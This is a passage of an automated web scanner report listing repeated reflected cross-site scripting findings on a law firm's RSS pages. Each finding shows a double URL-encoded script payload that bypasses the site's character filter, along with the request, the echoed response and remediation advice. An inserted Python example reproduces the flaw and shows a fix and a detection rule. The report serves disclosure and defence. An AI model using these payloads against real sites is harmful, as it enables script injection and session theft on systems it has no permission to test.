Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsse654b"><script>alert(1)</script>d4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml" value="">
...[SNIP]...

2.147. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294 was submitted in the REST URL parameter 2. This input was echoed as 53a9f"><script>alert(1)</script>e2b7ff89294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices53a9f"><script>alert(1)</script>e2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml" value="">
...[SNIP]...

2.148. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229 was submitted in the REST URL parameter 3. This input was echoed as 705db"><script>alert(1)</script>4b5b4bac229 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Bankruptcy__Financial_Restructuring705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Bankruptcy__Financial_Restructuring705db"><script>alert(1)</script>4b5b4bac229/rss.xml" value="">
...[SNIP]...

2.149. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 was submitted in the REST URL parameter 4. This input was echoed as a7f92"><script>alert(1)</script>7324d443b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92"><script>alert(1)</script>7324d443b57" value="">
...[SNIP]...

2.150. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150 was submitted in the REST URL parameter 1. This input was echoed as 413f8"><script>alert(1)</script>89fd6730150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150/practices/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss413f8"><script>alert(1)</script>89fd6730150/practices/Communications/rss.xml" value="">
...[SNIP]...

2.151. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e was submitted in the REST URL parameter 2. This input was echoed as 3fe4c"><script>alert(1)</script>24c5c30db8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices3fe4c"><script>alert(1)</script>24c5c30db8e/Communications/rss.xml" value="">
...[SNIP]...

2.152. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2 was submitted in the REST URL parameter 3. This input was echoed as 21c62"><script>alert(1)</script>da39f0f31a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Communications21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Communications21c62"><script>alert(1)</script>da39f0f31a2/rss.xml" value="">
...[SNIP]...

2.153. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a was submitted in the REST URL parameter 4. This input was echoed as c659f"><script>alert(1)</script>72b7507567a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Communications/rss.xmlc659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Communications/rss.xmlc659f"><script>alert(1)</script>72b7507567a" value="">
...[SNIP]...
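Worked example (added here; it is not part of the scanner output and not the site's code). Findings 2.153 through 2.168 share one sink: the site's custom 404 page, which answers 200 OK and echoes the requested URL into the name attribute of a hidden input in the IIS custom-error form 404;<original URL>. Every path segment on the host therefore reaches the same double-quoted attribute, which is why the crawler reports one issue per segment per feed. The Python below reproduces the decode-then-filter-then-decode-again ordering the remediation text describes, checks that it regenerates the exact echoed line from 2.153, and contrasts it with a pipeline that canonicalises before validating and HTML-attribute-encodes on output. The blocklist contents, the hostname prefix, the 404-page rendering and the function names are assumptions made for the example; the report only says that "certain characters" are blocked.

```python
"""Double URL-encoding bypass from finding 2.153, simulated and then fixed.

Example code written for this report page; assumptions are marked below.
"""
import html
import re
from urllib.parse import unquote

# Request path and echoed response line copied from finding 2.153.
PAYLOAD = ("c659f%2522%253e%253cscript%253ealert%25281%2529"
           "%253c%252fscript%253e72b7507567a")
REQUEST_PATH = "/rss/practices/Communications/rss.xml" + PAYLOAD
REPORT_ECHO = ('<input type="hidden" name="404;http://www.wileyrein.com:80'
               '/rss/practices/Communications/rss.xmlc659f"><script>alert(1)'
               '</script>72b7507567a" value="">')

# Assumption: the characters the site blocks. The report only says "certain characters".
BLOCKLIST = '<>"\''


def web_server_decode(raw_path: str) -> str:
    """The web server URL-decodes the request path once (%2522 -> %22)."""
    return unquote(raw_path)


def blocklist_filter(value: str) -> bool:
    """True when the value is accepted, i.e. contains no blocked character."""
    return not any(ch in value for ch in BLOCKLIST)


def render_hidden_input(value: str) -> str:
    """Assumed 404-page template: the original URL lands in a double-quoted attribute."""
    return f'<input type="hidden" name="404;http://www.wileyrein.com:80{value}" value="">'


def vulnerable_pipeline(raw_path: str) -> str:
    """Filter after one decode, then decode again before echoing.

    This is the ordering the remediation text describes: the filter never
    sees '"' or '<' because they are still %22 and %3c when it runs.
    """
    once = web_server_decode(raw_path)
    if not blocklist_filter(once):
        return "blocked"
    twice = unquote(once)            # the unnecessary second decode
    return render_hidden_input(twice)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing, so validation sees the final form.

    Bounded so that deeply nested encodings cannot be used to burn CPU.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many URL-encoding layers")


def hardened_pipeline(raw_path: str, validate: bool = True) -> str:
    """Canonicalise, validate, then HTML-attribute-encode on output.

    The output encoding alone neutralises the injection; the validation step
    is defence in depth and can be switched off to demonstrate that.
    """
    canonical = canonicalize(web_server_decode(raw_path))
    if validate and not blocklist_filter(canonical):
        return "blocked"
    return render_hidden_input(html.escape(canonical, quote=True))


def is_multi_encoded(raw_path: str) -> bool:
    """Detection rule: after one decode a path should contain no further %XX."""
    return re.search(r"%[0-9A-Fa-f]{2}", unquote(raw_path)) is not None


if __name__ == "__main__":
    print("vulnerable :", vulnerable_pipeline(REQUEST_PATH))
    print("matches report echo:", vulnerable_pipeline(REQUEST_PATH) == REPORT_ECHO)
    print("hardened   :", hardened_pipeline(REQUEST_PATH))
    print("encoded    :", hardened_pipeline(REQUEST_PATH, validate=False))
    print("multi-encoded request:", is_multi_encoded(REQUEST_PATH))
```

In practice the single decode the web server already performed is the only one that should happen, so the real fix is to delete the second decode and encode on output; canonicalize is there to show where validation must sit if an application insists on its own decoding. is_multi_encoded is a cheap check for a WAF rule or log review: a legitimate path segment that still contains %XX after one decode is rare enough that flagging it is usually acceptable, and it catches every request in findings 2.153 through 2.168.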

2.154. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650 was submitted in the REST URL parameter 1. This input was echoed as f366f"><script>alert(1)</script>a6a0233650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssf366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650/practices/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssf366f"><script>alert(1)</script>a6a0233650/practices/Corporate/rss.xml" value="">
...[SNIP]...

2.155. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb was submitted in the REST URL parameter 2. This input was echoed as 8174b"><script>alert(1)</script>fb0e9ce51eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb/Corporate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices8174b"><script>alert(1)</script>fb0e9ce51eb/Corporate/rss.xml" value="">
...[SNIP]...

2.156. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b was submitted in the REST URL parameter 3. This input was echoed as 114fe"><script>alert(1)</script>550bbc6f87b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Corporate114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Corporate114fe"><script>alert(1)</script>550bbc6f87b/rss.xml" value="">
...[SNIP]...

2.157. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Corporate/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 was submitted in the REST URL parameter 4. This input was echoed as 6f9cb"><script>alert(1)</script>495b8d11a77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Corporate/rss.xml6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Corporate/rss.xml6f9cb"><script>alert(1)</script>495b8d11a77" value="">
...[SNIP]...

2.158. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f was submitted in the REST URL parameter 1. This input was echoed as d782d"><script>alert(1)</script>d2f1002c72f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssd782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssd782d"><script>alert(1)</script>d2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml" value="">
...[SNIP]...

2.159. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Election_Law__Government_Ethics/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232 was submitted in the REST URL parameter 2. This input was echoed as 8ddc1"><script>alert(1)</script>11d8c833232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

